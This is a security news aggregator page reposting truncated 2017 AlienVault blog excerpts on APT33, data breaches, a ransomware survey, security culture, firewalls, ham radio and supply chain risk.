APT33 has developed numerous tools, including a new backdoor called TURNEDUP. TURNEDUP is capable of uploading and downloading files, creating a reverse shell, taking screenshots, and gathering system information. FireEye found that APT33 has also leveraged DROPSHOT, a dropper

Published 2017-10-17. www.secnews.physaphae.fr/article.php?IdArticle=419823

SpiceWorld 2017!

Garrett Gross, Director, Field Enablement at AlienVault, spoke on Tuesday about open source tools. It was a standing-room-only crowd! Later on Tuesday, Garrett participated in a panel in the Main Ballroom. Kevin Mitnick presented on Wednesday, and did a book signing in the booth right next to us. We had several luminaries come by the booth, including a Security Guy and Slava, a prominent SpiceHead. People loved the astronaut theme. Jordan Sander even wore astronaut socks when working the booth! Like previous years, Holly Barker had some intimate moments with Spice Rex, shown below proposing marriage. All in all, an awesome event!

Published 2017-10-16. www.secnews.physaphae.fr/article.php?IdArticle=419331

Things I Hearted this Week: 13th October 2017

Disqus said a 2012 breach, discovered on October 5th, exposed information on 17.5 million users from as far back as 2007.
That’s a pretty significant breach; however, the silver lining was how well Disqus handled it, and the speed and clarity with which it shared details. Troy Hunt goes over this on his blog.

Disqus reveals it suffered a security breach in 2012 | Engadget
Disqus Breach Exposed 17.5m Emails | Infosecurity
Disqus Data Breach: 17.5 Million Exposed, Shows Rapid Response | IT Security Central

Bitcoin Miners and AWS

As more companies embrace aspects of cloud computing, we are seeing cyber criminals, and indeed researchers, increasingly turn their focus towards cloud security. In recent months there have been many instances of misconfigured Amazon storage (S3 buckets) exposing sensitive information publicly. However, there is more than just precious data in the cloud. This attack shows that the computing power of the cloud is itself sought after, for bitcoin mining or other nefarious purposes, which is why leaked or over-privileged AWS credentials matter even when no data is stolen.

Forget stealing data — these hackers hijacked Amazon cloud accounts to mine bitcoin | Business Insider
AWS Cloud Hacked by Bitcoin Miners | Enterprise Tech

Malvertising campaign targets Pornhub

Hackers used malvertising on the adult video website Pornhub and abused the Traffic Junky advertising network to redirect users to a malicious website. Chrome and Firefox users were shown a fake browser update window, while IE and Edge users got a fake Flash update. Malvertising campaigns are a favoured avenue for many attackers. In 2016, Google removed 112 million bad ads which, on top of malware, included illegal product promotion and misleading ads.

Published 2017-10-13. www.secnews.physaphae.fr/article.php?IdArticle=418401

Our Newest Training Course - Security Analysis using AlienVault USM Anywhere

Security Analysis using AlienVault® USM Anywhere™ course. We’ve abducted (not really!)
subject matter experts as well as real-life AlienVault customers to ensure we develop the right course for your needs. Many of the above quotes are from customers who have taken a previous AlienVault USM Anywhere course, which teaches you about the operational side of running USM Anywhere in your environment. This new course will, as requested by the customers above, concentrate on understanding where alarms come from and how to effectively investigate and respond to them.

The two-day Security Analysis using AlienVault® USM Anywhere™ course provides you with the knowledge and tools to fully leverage AlienVault USM Anywhere to perform security analysis. Students will gain new skills in identifying and remediating threats using AlienVault USM Anywhere. Course participants will gain these skills through hands-on examples and exercises in performing and analyzing attacks on a live environment, with multiple asset types running a range of different software.

Topics covered include:

- Preparation: Know Your Environment
- USM Anywhere Tuning
- Threat Intelligence: Detect and Research Threats and Attack Methods
- Detection: Evaluate Alarms and Events
- Containment and Response: Minimise Impact and Automation
- Root Cause Analysis: Trace the Timeline of an Incident
- Recovery: Recover from an Incident
- Reporting: Compliance and Reporting

You will benefit from instructor lectures, live instructor demonstrations, and numerous hands-on practice labs, which make up over 50% of the course. This hands-on course ensures that you are fully equipped to use AlienVault’s USM Anywhere functions and features, as well as a few useful external tools and sites, to detect and respond to security incidents.
Published 2017-10-11. www.secnews.physaphae.fr/article.php?IdArticle=417647

Do InfoSec Folks Need to be Able to Write Code?

#infosec community, must contributors be able to write code?
— Kate Brew (@securitybrew) September 28, 2017

I tried to make it OK to vote "yes", since the InfoSec community is typically open and inclusive of all kinds of people, and I didn't intend for a "yes" vote to be construed as negative. Not sure I accomplished that goal, but in any case the comments offered were maybe even more telling of the community's views than the numeric result of the poll. The question turned out to be much more controversial than I expected. Several people were adamant that coding, especially writing scripts to automate tasks, is an essential part of the InfoSec job. Then there were others who had more of a "it takes a village" attitude, and suggested that many different skills are of value to InfoSec professionals.

Coding skills are clearly both valuable and valued

This poll changed my views on the skills I would recommend for those aspiring to work in InfoSec. The ability to write code to automate processes would be advantageous for anyone trying to get into the field. At the same time, so would a background in network engineering, system administration or help desk. There are many paths that lead to InfoSec careers. Not everyone who works in InfoSec comes from a coding background, but the comments suggest that those who do find it helpful. And while not everyone in InfoSec is proficient in coding/scripting, this ability sure seems to help those who are.

It's not yes/no. There will be valuable jobs in infosec without coding. But there's a non-decreasing number of roles that need code skills.
— Paco Hope (@pacohope) September 28, 2017

Interesting Q. I'm scanning through all the names of those who I think made the largest infosec contributions, and how many know how to code.
— Jeremiah Grossman (@jeremiahg) September 28, 2017

The way things are going, the next generation will graduate from school knowing how to code.
— Jen Savage (@savagejen) September 28, 2017

Coding skills

Published 2017-10-10. www.secnews.physaphae.fr/article.php?IdArticle=417173

Culture Eats Security for Lunch

In celebration of Week 2 of National Cyber Security Awareness Month (NCSAM), surprise! Another blog!

In the wild we see culture: the fierce predator, the T-Rex of an organisation. It moves swiftly and silently, devouring all in its path. Strategy is its favourite dish; it chomps down large chunks of strategy and washes it down with the tears of shareholders. Security is also a delicacy that culture enjoys as a Sunday roast.

In the aftermath of a security incident or breach, many experts focus on the people, process, and technology side of the equation. Did the people have the right skills, were the right processes in place, and did they invest in the right technology that would have stopped the attack? While these are good and important questions to ask, culture underscores each aspect. A brittle culture can doom even the greatest of security strategies.

The reality is that culture is more efficient than strategy. People don’t go above and beyond the call of duty because something is written in a policy. They do it because they believe the company, their colleagues, and peers would do the same for them. In this regard, culture provides greater discipline than disciplinary action does.
If a company has a culture of aspiring to be environmentally friendly, it doesn't need a policy to tell people to separate their rubbish into the relevant bins; co-workers will take care of that. Similarly, when a company has a strong security culture, co-workers will help take care of any issues that need addressing, such as leaving workstations unlocked, sharing passwords, or forgetting sensitive documents on the printer.

Building a security culture from the ground up is akin to the Broken Windows Theory popularised by James Q. Wilson and George L. Kelling, where they advocated reducing large crimes by stopping smaller crimes. The authors claim that a broken window left for several days in a neighbourhood would trigger more vandalism. The small defect signals a lack of care and attention on the property, which in turn implies that crime will go unpunished. This theory was used to fight vandalism on the New York Subway - arguing that cleaning up graffiti on trains would prevent further vandalism.

Perhaps one of the biggest strengths of having a strong security culture is that there isn't the desire to find scapegoats. When a security breach occurs, firing the CISO or blaming individuals won't undo the breach. Taking a measured approach to understand what went wrong, and finding ways to fix it, will build business resilience. It reinforces the fact that security will never be one hundred percent perfect, and there will be tough times that the organisation will overcome together. This creates the difference between staff coming to the defence of their company during a crisis, as opposed to joining in the attack.

The security culture extends beyond the corporate environment though, and can be seen in people's personal lives. This is very much needed. When we look at the amount of information that people have online, it is important to foster an extended culture of security within the home.
Making family members aware of online dangers and how to navigate them is sometimes more important than protecting corporate data. But to be effective in the long run, good security needs to be observable. Otherwise it is just as easy to slip into bad practices. A study conducted by Gino, Ayal and Ariely demonstrated the connection between cheating and the impact of it on oth

2017-10-09T13:00:00+00:00
http://feeds.feedblitz.com/~/467054168/0/alienvault-blogs~Culture-Eats-Security-for-Lunch
www.secnews.physaphae.fr/article.php?IdArticle=416748

AlienVault Blog: 2017 Ransomware Report

Cybersecurity Insiders, partnering with the 380,000+ member Information Security Community on LinkedIn, commissioned Crowd Research Partners to conduct an in-depth study to gather insights, reveal the latest ransomware trends, and provide guidance on effectively addressing the ransomware threat. A brief extract follows, but you can read the whole report here!

Key Findings

Ransomware is the fastest growing security threat, perceived as a moderate or extreme threat by 80% of cybersecurity professionals.
75% of organizations affected by ransomware experienced up to five attacks in the last 12 months alone; 25% experienced 6 or more attacks.
79% predict ransomware will become a larger threat over the next 12 months.
Only a small fraction of respondents say they would pay the ransom or negotiate with the attackers.
59% of organizations are either not confident at all or only slightly to moderately confident in their ransomware defense.
Email and web use represent the most common ransomware infection vectors, with employees opening malicious email attachments (73%), responding to a phishing email (54%) or visiting a compromised website (28%).
The information most at risk from ransomware attacks is financial data (62%), followed by customer information (61%).
From a solution perspective, the majority of identified ransomware attacks were detected through endpoint security tools (83%), email and web gateways (64%), and intrusion detection systems (46%).
Security professionals rank user awareness training as the most effective tactic to prevent and block ransomware (77%), followed by endpoint security solutions (73%) and patching of operating systems (72%).
Data backup and recovery (74%) is by far the most effective solution for responding to a successful ransomware attack. 96% of respondents confirm they have a data backup and recovery strategy in place.
A majority of 54% say they could recover from a successful ransomware attack within a day, while 39% estimate it would take more than one day to a few weeks to recover. Speed of recovery is absolutely mission-critical, as business cost escalates with every hour the business cannot fully operate, causing system downtime (41%) and productivity loss (39%).
Today's main obstacles to stronger ransomware defense are all about resources and staying current on the latest ransomware exploits: lack of budget (52%), dealing with the evolving sophistication of attacks (42%), and lack of human resources (33%).
The silver lining: 60% of organizations expect their budget for ransomware security to increase.

Check out the whole report.

2017-10-05T13:00:00+00:00
http://feeds.feedblitz.com/~/465218044/0/alienvault-blogs~Ransomware-Report
www.secnews.physaphae.fr/article.php?IdArticle=415746

AlienVault Blog: A Psychological Approach to Cyber Security

It's no secret that I'm passionate about Cyber Security. So naturally, I do what any other obsessed person would do: listen to podcasts whenever I get the chance. This past Monday, I was walking from my campus to the train station while listening to an interview on Recorded Future with Myke Cole.
A little background on Myke Cole: he's a famous author and has experience working in Government Intelligence. The part of the interview that stuck out to me was when Cole discussed the understanding, goals and motivations of cyber-terrorists. This was the catalyst for my blog.

I did my undergrad study in psychology before I started my Master's degree in Cyber Security. The psych background has given me some strong analytical and interpersonal skills, and those abilities have come in handy in my cyber security studies. I call this my non-technical approach to a technical field. Now, if I claimed to know how cyber-criminals think, that would be an overestimation of my ability, but I'd say that my psychology background helps me have a better understanding of their motivations.

To be honest, I kind of love to show off my psych skills every now and then, especially at my favorite place, the Hookah Lounge. So, when I talk to someone new, I might bring up how passwords can be easily cracked just by analyzing a person's interests, or by using information and pictures from a person's social media. An illustration of this is my friend "Stacey" and her Facebook profile. She has a picture of herself with Chicago Cubs fans. We can assume that her love for the Cubs or something to do with the team (i.e. players, numbers, and important dates in Cubs history) could be a potential password selection. Stacey also likes to watch superhero movies, so maybe her password might correspond to her favorite hero or villain. The process becomes even easier with password policies that require special characters, because passwords become more predictable under such rules. By combining these with her interests, voila, we can have an idea of what password she uses. She told me I was close and that her password had to do with a hobby of hers that she did with her Dad when she was younger.
Now, this doesn't make me or anyone the Criss Angel of password cracking, but it does provide a good idea of how to improve company password policies. I want to expand this to also encompass cyber-crime, cyber-terrorism, threat analysis, etc. We begin to understand that stopping this from a cyber security perspective becomes a lot easier when we become empathic and aware of the factors that can help us understand a group's motives and what really drives its members to commit malicious acts. Various factors, such as social media behavior patterns, socio-economic status, and past criminal background, can provide us with clues. However, even with enough data, we are still unsure of when and where cyber-attacks will originate. As Batman says, "It's never easy dealing with the Joker." Understanding where, what, and why our Joker attacks their target will greatly change how we protect our assets and infrastructure within the cyber-security landscape. This helps us Cyber Security professionals to stay a few steps ahead of the adversary and sometimes even be able to checkmate them before any damage occurs.

Conclusion

2017-10-04T13:00:00+00:00
http://feeds.feedblitz.com/~/464627122/0/alienvault-blogs~A-Psychological-Approach-to-Cyber-Security
www.secnews.physaphae.fr/article.php?IdArticle=415278

AlienVault Blog: How to Stay Safe Online – Tips for Regular Folks

National Cyber Security Awareness Month (NCSAM) with a weekly series of security articles on how to improve the state of cyber security-ness. Staying safe online has many similarities with staying safe on the line, aka tightrope walking. It involves a delicate mix of courage, foolhardiness, balance, poise, and the threat of falling to a horrible death. There are many lists that detail the extensive do's and don'ts of staying safe online, so I won't repeat them.
Rather, I've distilled what I believe to be the most important information as captured through events and conversations in my daily life.

If it's too good to be true

Most of the time, my children make a mess in their room and, despite repeated requests, I end up having to do most of the cleaning myself. One weekend, I made a deal with them: if they cleaned their rooms properly, I'd give them each five pounds, take them to a movie, pizza, let them have sweets and stay up late. After an hour, their rooms looked cleaner than they had ever been. I didn't deliver the goods. I laughed at them and told them that if something sounds too good to be true, it usually is. This is good parenting, as it demonstrated to them that they are perfectly capable of cleaning their room, and that they should be careful as to what they believe in real life or online, and are less likely to click on a link in an email or pop-up.

Keeping software up to date

My daughter wanted a cat. Despite being allergic to cats, I agreed on the condition that I would buy the cat, but would not spend any money on buying it any cat food. "You're so cruel! The cat would get weak and die," said my daughter. Operating systems, browsers, security software, and apps, like cats, need to be kept up to date and 'fed' the latest updates and patches. Neglecting to do so can cause them to grow frail and eventually die, possibly taking your business with them. I hope my daughter remembers this lesson when she grows up, once she gets over not having a cat.

Backup

While watching Superman with my older son, he said that he wished Superman was his dad - that way he would be strong, and could fly, and have lasers shoot from his eyes. I flexed my arm, pointed to my bicep and told him that "dad is strong", to which he merely replied, "but you're not Superman." In my mind, I immediately scrapped plans to pay for his education or buy him a nice car.
It kind of works out for the best because it means I will be able to spend all that extra money on my younger son. This is why backups are important, because you never know when the first one will fail you.

Passwords

One day I decided it would be easier if I called my wife and four children all "Bob". It was the ultimate in convenience. If I needed something I only needed to ask for Bob. Birthday cards could be recycled. I could even get bulk discounts on items such as personalised keyrings. The day started off well: I asked Bob if she wanted a cup of tea and yelled at Bob for being late for school. Bob was very confused about this and asked what was going on. But I didn't have time to explain because Bob needed his feed. In the end, all the Bobs had enough and stopped talking to me, saying using the same name for everyone was a stupid idea. A bit like reusing the same password, I guess.

Sharing

While on holiday, a friend posted a few family photos on Facebook that not only included my children, but caught me before I had a chance to suck my gut in and smile properly. As a result, I came

2017-10-02T13:00:00+00:00
http://feeds.feedblitz.com/~/463377560/0/alienvault-blogs~How-to-Stay-Safe-Online-%e2%80%93-Tips-for-Regular-Folks
www.secnews.physaphae.fr/article.php?IdArticle=414331

AlienVault Blog: Things I Hearted this Week: 29th Sept 2017

breaches will just keep rolling to the point of fatigue. But at least they will be ginger latte flavoured breaches.

When a breach costs the top job

In an M. Night Shyamalan plot twist, Richard Smith, CEO of Equifax, has resigned in the wake of the huge data breach which saw an estimated 143 million records exposed. Is there any doubt that information security should be taken seriously at the highest of levels? Or do the heads of CEOs need to roll on a more frequent basis for businesses to understand security isn't an isolated IT issue to manage?
Equifax CEO suddenly 'retires' following an epic data breach affecting up to 143 million people | CNBC
Equifax CEO Richard Smith resigns after uproar over massive hack | Bloomberg
Trying to Stem Fallout From Breach, Equifax Replaces C.E.O. | NY Times

How much does that train journey cost?

Transport for London, which runs the London Underground, aka the Tube, introduced WiFi on trains a couple of years ago. Many commuters were glad to be able to connect in the otherwise dead zones, giving an excuse to stare at their phones to avoid even accidental eye contact with another Londoner making their way to or from work. However, getting even a little bit of data attracts business attention like blood in the water attracts sharks. There are plans to track customers through their WiFi connection and then sell on the data – potentially netting Transport for London (TfL) £322m. Of course, this isn't the only company to do so. Many free WiFi providers, such as those in shopping centres (malls), will track customer movement. The only way to defend against such tracking is to turn off WiFi on the device. It reinforces how much customer data is worth, but how little people actually care, or consider the cost. Maybe GDPR will help in this regard, as TfL will have to demonstrate consent per person for this, and also allow for opt-outs.
TfL plans to make £322m by collecting data from passengers' mobiles | Sky News
Transport for London bosses planning to track commuters using WiFi | Evening Standard
Here's what TfL learned from tracking your phone on the tube | Gizmodo

Qualifications and tech jobs

This isn't really news – but a deb

2017-09-29T13:00:00+00:00
http://feeds.feedblitz.com/~/462428416/0/alienvault-blogs~Things-I-Hearted-this-Week-th-Sept
www.secnews.physaphae.fr/article.php?IdArticle=413871

AlienVault Blog: Explain How Firewalls Work to Me

I'm sure you've seen firewall diagrams like this, but what's really going on? Firewalls filter network traffic so that you only receive data that you should be getting. No firewall works perfectly, and a lot of a firewall's effectiveness depends on how you configure it.

To get a basic grasp of how firewalls work, it's important to understand how TCP packets work. The data that your computer sends and receives over the internet or an internal network is made up of TCP packets and UDP packets. TCP packets can be more effectively filtered by firewalls because they contain more information in their headers. TCP packets contain information such as source and destination addresses, packet sequence information, and payload. That information allows your network interface to deliver data properly, and a firewall can compare that information to the rules you configured it with. For example, all HTTPS data is transmitted through TCP packets. When HTTPS data is sent to your computer through your network interface while you surf the web, your operating system will know that it's data that's supposed to go to your web browser. The same applies whether you are surfing the web on your phone, on your PC, or even on a server machine in your datacenter. With the proliferation of the Internet of Things, you might even be surfing the web from a touchscreen embedded in your refrigerator.
Your HTTPS data is used the same way regardless. UDP packets can be filtered by port, but their headers lack the information that TCP packets have for more sophisticated filtering.

There are three basic types of firewalls.

Stateless or packet filtering firewalls inspect each packet individually, without considering the trends of the data you're receiving. Imagine a bouncer at a nightclub. Each person lining up to get in will be considered on an individual basis. There might be people on their own, parties of one. There might be people trying to get in as a social group. The bouncer may be instructed to forbid kids who are below legal drinking age and people who are wearing criminal gang colors from entering the club; those are your firewall rules. Instead of looking at a high school kid in a group of high school kids and just excluding them as a collective, the bouncer will look at each individual high school kid and insist that they present their ID.

Stateful firewalls do what stateless firewalls do, and they also consider the connection states of streams of data. This is the bouncer who may see one high school kid and then reject the whole group of high school kids, rather than asking each of them to prove their age. Stateful firewalls collect a series of packets before they determine their connection state, and then compare those findings to the firewall rules, rather than applying the rules to each individual packet of data.

Application firewalls generally do everything that stateful firewalls do, and they also analyze the actual data content of the packets, not just the headers. I suppose the nightclub bouncer becomes a TSA agent at the airport, making you go through a metal detector and a full body x-ray. Application firewalls allow you to set firewall rules for individual applications.
That's how the software firewall I installed on my Android

2017-09-27T13:00:00+00:00
http://feeds.feedblitz.com/~/461914644/0/alienvault-blogs~Explain-How-Firewalls-Work-to-Me
www.secnews.physaphae.fr/article.php?IdArticle=412872

AlienVault Blog: Ham Radio for Emergency Communications

(EMCOM). Let's start with a quick overview of the Amateur Radio Service. Ham Radio is a huge hobby with considerable width and breadth; as such, I'm going to use lots of generalization and gross simplification. But it starts with passing an exam and being licensed by the FCC. Exams must generally be taken in person and on paper. The American Radio Relay League has a list of exam providers and locations. The exams are based on a published question pool, and the fee for the exam is between free and $15. There are three levels of licensing: Technician, General, and Extra, which grant the ability to use different allocations of the radio spectrum. The exams are not difficult: they are multiple choice and there are lots of study resources available, including mobile apps. There is no requirement to send Morse Code anymore! Once you pass your test, you do have to wait a few days to get your license and callsign; these are published on the FCC's website; my entry is here.

The Technician license gives you access to Ham Radio bands in the VHF/UHF range (30 MHz - 10 GHz). Radio waves in this range are generally line of sight (LoS). You must have an unobstructed path between your transmitter and the receiver at the destination. This is what you have probably experienced with GMRS/FRS radios (which are UHF). In order to extend the range and usefulness of LoS communications, repeaters placed in elevated locations are used. This can be extended even further with the use of linked repeaters. Repeaters do exactly what their name sounds like: they receive your signal and then re-broadcast it.
As licensed operators, we also have the ability to use far more power (up to 1500 watts) than the GMRS/FRS radios (about 1 watt). Systems based on these frequency ranges are used for local communications, generally within a metro area.

The General license type gives you access to the HF bands (1 MHz - 29 MHz). In this frequency range the radio waves travel by skywave instead of LoS. This allows you to potentially talk around the world by bouncing radio waves off of the ionosphere. The distance and direction of your communications are heavily dependent on the condition of the ionosphere. Things that affect the ionosphere: Da

2017-09-26T13:00:00+00:00
http://feeds.feedblitz.com/~/461639490/0/alienvault-blogs~Ham-Radio-for-Emergency-Communications
www.secnews.physaphae.fr/article.php?IdArticle=412388

AlienVault Blog: Securing The Supply Chain Is As Important As Securing The Front Door

In August 2010, the FSA hit Zurich Insurance with a £2.275m fine for data loss, for not checking its controls over outsourced data processing. In August 2008, Zurich SA had lost an unencrypted back-up tape during a routine transfer to a data storage centre. As there were no proper reporting lines in place, Zurich UK did not learn of the incident until a year later.

In December 2013, Target had a data breach that impacted 70 million customers. In this attack, attackers broke into the retailer's network using network credentials stolen from a third-party supplier that provided refrigeration and HVAC systems.

In November 2014, Home Depot had a data breach in which hackers stole 56 million customer credit and debit card accounts and 53 million customer email addresses. Home Depot said the hackers initially broke in using credentials stolen from a third-party vendor. The attackers used a third-party vendor's user name and password to enter the perimeter of Home Depot's network.
In the fall of 2015, Wendy's fast food restaurants had an incident that disclosed and exposed customer credit card data. The malware installed in point-of-sale systems was discovered at over 1,000 of its franchised U.S. restaurants. Hackers gained access to the machines using the remote access credentials of a third-party service provider.

In July 2017, a reported 14 million Verizon subscribers may have been affected by a data breach. These records were held on a server that was controlled by Israel-based Nice Systems. Nice Systems is not a small company. Instead, they are an extremely well-known and trusted company that 85 of the Fortune 100 work with. Verizon said that it "provided the vendor" with data as part of an ongoing project. The spokesperson said that the employee of Nice incorrectly allowed external access.

Attackers have become smarter and they are choosing the path of least resistance to break into an organisation. The above-mentioned incidents highlight a key point: the organisation suffered the data loss not because of an attack or a failure of control on its own side, but on the supplier's side. The real target of the RSA breach was not RSA itself but its customer(s). Big organisations are more likely to have security breaches due to the higher probability of a weak link in their complex supply chain ecosystem.

How have regulators and organisations responded?

Regulators responded to this issue by putting in place requirements for organisations to have an assurance process for managing supplier security risks. A number of organisations responded to this regulatory requirement by putting in place a "Supplier Security Assurance Framework" that includes a supplier security policy and a supplier security due-diligence process for managing supplier security risks. In 2014, the UK government published a Cyber Essentials Scheme to reduce the levels of cyber security risk in its supply chain.
The scheme defines a set of controls which, when properly implemented, provide organisati

2017-09-25T13:00:00+00:00
http://feeds.feedblitz.com/~/461297656/0/alienvault-blogs~Securing-The-Supply-Chain-Is-As-Important-As-Securing-The-Front-Door
www.secnews.physaphae.fr/article.php?IdArticle=411993

AlienVault Blog: Things I hearted this week - September 22

Meet APT33: A Gnarly Iranian Hacker Crew Threatening Destruction | Forbes
Threat data, IOCs and information on APT33, aka greenbug | OTX

Data breaches and class action lawsuits

Should individuals whose data has been breached have the right to sue companies? It's a tricky question, and one that the courts are seemingly having trouble deciding on. Recently, a judge dismissed two consolidated class actions by more than 21m federal employees who had information breached by the Office of Personnel Management (OPM). The judge concluded that the federal employees could not establish their threshold right to sue in federal court because they had not shown they faced imminent risk of identity theft, even though nearly two dozen of those named in the class actions claimed their confidential information had already been misused.

Hopefully things will change going forward. The problem with identity theft is that it's not time-dependent. An attacker could hoard details for a long period before committing a crime. And even when an identity is stolen, it is difficult to tie back to where the breach occurred.
OPM Data Breach Lawsuit Tossed, Fed Plaintiffs will Appeal | Dark Reading
OPM Says Gov't Workers' Data Breach Suit Fails | Law360
In the long run, class actions may not be the best way to redress data breaches | Reuters
Somewhat related: My three years in identity theft hell | Bloomberg

The Ghost of Windows XP

As the lyrics go, "They stab it with their steely knives, but they just can't kill the beast." In this case, the beast seems to be Win XP, which, despite being woefully outdated, continues to make its presence felt. The latest announcement is that a fifth of the Manchester police department are running Win XP.

Manchester police still relies on Windows XP | BBC
Manchester Police are using Windows XP on one in five computers | V3

When insurance goes too far

Melina Efthimiadis, along with her husband, wanted to add personal umbrella liability insurance to their Nationwide homeowner's policy. She says they have been low-risk clients, so she didn't think it would be a problem. In the application process for Nationwide, Melina says they had to write down the number of dogs they owned and their breeds, wh

2017-09-22T13:00:00+00:00
http://feeds.feedblitz.com/~/460675978/0/alienvault-blogs~Things-I-hearted-this-week-September
www.secnews.physaphae.fr/article.php?IdArticle=411332

AlienVault Blog: Blockchain Technology as a Replacement for Our Stolen Identities

About a month ago, there was a bit of shock when it was reported that a company had developed an implantable chip that could be used for simple tasks such as opening a door, or authenticating you to a computer system. This implantable biochip and its associated perils are reminiscent of those in so many science fiction movies. Many of us recoiled at the idea that we would become trackable by organizations that we did not trust. Is it too late to reconsider this idea?
Many would say that the biochip data must be stored somewhere, so it is just as vulnerable as the data that was already taken; how is it any different from that held by the credit bureaus? The difference is that the biochip companies have a clean security slate from which to build their practice, and they have plenty of breach history to draw upon in order to avoid doing it incorrectly. However, is that any guarantee that they will get it right? Of course not. I, like most, am not ready for my biochip.

Perhaps the next system of identification could be based on blockchain technology, whereby we are all issued a hash number. Think of the possibilities of that. We can all have a unique identifier based on a characteristic that is unique to each of us. Perhaps a hash value of the digitized value of all of your fingerprints, or the hash of your iris scan at a particular point in time. The interesting part would be that all biological children of two individuals would be given an identity generated from the parents' hash IDs until such time as they may be issued an individual hash.

The worst part of all the recent data loss is that no matter what method is devised to replace our identities, it must still be linked back to those old, stolen credentials, or much of the economic structure of society will unravel. We are certainly at the doorway of a new age of identity and identity protection.

2017-09-20T13:00:00+00:00
http://feeds.feedblitz.com/~/460155244/0/alienvault-blogs~Blockchain-Technology-as-a-Replacement-for-Our-Stolen-Identities
www.secnews.physaphae.fr/article.php?IdArticle=410310